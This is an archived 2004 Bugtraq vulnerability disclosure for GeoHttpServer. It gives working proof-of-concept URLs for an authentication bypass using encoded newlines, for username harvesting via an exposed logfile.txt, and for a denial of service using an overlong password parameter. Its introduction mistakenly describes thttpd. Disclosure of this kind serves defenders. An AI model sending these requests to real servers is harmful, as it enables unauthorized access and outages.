GeoHttpServer Authentification Bypass Vulnerability & D.O.S (Denial Of Service)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/22/04

  • Next message: Steve G: "Re: Re[2]: Hijacking Apache 2 via mod_perl"
    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Thu, 22 Jan 2004 19:23:16 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Software: GeoHttpServer
    Vendor: GEOVISION INC
                            http://www.geovision.com.tw
    Versions: ALL
    Platforms: Unix
    Bug: Authentification Bypass Vulnerability & D.O.S (Denial
    Of Service)
    Risk: High
    Exploitation: Remote with browser
    Date: 22 Jan 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    thttpd is a free "Open Source" webserver that comes by default with unix
    systems such as
    FREEBSD and Linux.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    The GeoHttpServer Security is pretty good. Some users, who understand what
    they are doing configure the server to authentificate login attempts.

    The server uses this authentification code:
    **********************************************
    <html><head><title>Login In</title>
    </head><body><center>
    <form method="POST" action="phoneinfo">User Name:</BR>
      <input type="id" name="id" size="10"><p></p>
      Password:</BR>
      <input type="password" name="pwd" size="10">
      <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
      <input type="radio" name="ImageType" value="2">GIF</p>
      <p><input type="submit" name="send" value="Submit"><input type="reset"
    name="CANCEL" value="Cancel"></center><center><br>
      </p>
    </form>
    </center>
    </body>
    </html>
    **********************************************

    Amazingly - http://>/%0a%0a Bypasses it!
    You get the GeoHttpServer default Main Page.

    Now the main page leads to functions that also require authentifiaction,
    In order to retrieve a user name we can go to
    http://>/logfile.txt
    Which generally contains the last logins and usernames.
    In most cases the password will be the same as the user.

    In addition there is an authentification form inside the server that
    requires a name and
    a password in order to see the server info/config.
    Manipulating this links can cause Denial Of service of the server.

    P.O.C(Proof Of Concept):
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    Another D.O.S caused by the server is an Internet Explorer D.O.S when
    someone is watching
    video stream from the server and presses the reconnect button, I.E has an
    overflow.
    Internet Explorer Version: 6.0.2600.0
    Module Stuck: msxml3.dll
    Module Version: 8.20.9415.0
    Offset: 00013ed6

    http://theinsider.deep-ice.com/

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Authentification Bypass - http://>/%0a%0a Bypasses it!
    Denial Of Service -
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Things that are unlikeable, are NOT impossible."
    

  • Next message: Steve G: "Re: Re[2]: Hijacking Apache 2 via mod_perl"

    Relevant Pages

    • Re: Problem with Xserver and Gnome applications
      ... The program 'gedit' received an X Window System error. ... This probably reflects a bug in the program. ... request belongs to an X11 extension. ... server does not support that extension and gedit doesn't check for it ...
      (comp.sys.sgi.admin)
    • Re: bug in java.net.Socket??
      ... I've been trying to get a passive ftp server working, but unfortunately, ... there seems to be a VERY low level bug in the Socket command that makes ... server is already serving a connection new connection attempts are ... Now I don't know for sure, but I STRONGLY suspect that it is a java bug. ...
      (comp.lang.java.programmer)
    • Re: [Full-disclosure] Which is more secure? Oracle vs. Microsoft
      ... AK>> The following bugs are Oracle application server bugs (Oracle Portal ... DL> app these are PL/SQL packages in the database server. ... is an Oracle database bug? ...
      (Full-Disclosure)
    • Re: Word display a strange message while we open a file for the first time
      ... Networking just ain't my gig anymore:-} ... we ALL know about this bug with Office 2004 and Office 2008. ... I have some iMac and user use it to be logged on a server. ... John McGhie, Microsoft MVP, Consultant Technical Writer, ...
      (microsoft.public.mac.office.word)
    • Re: ubuntu-users Digest, Vol 79, Issue 156
      ... I've got just one bad bug that I hope will be fixed in time for Beta1. ... NW series, with Ubuntu 10.04 installed, although it worked fine on Windows. ... Subject: Hostname configuration on DHCP/DNS server: /etc/hosts vs. ... but it comes by default in a standard Ubuntu installation. ...
      (Ubuntu)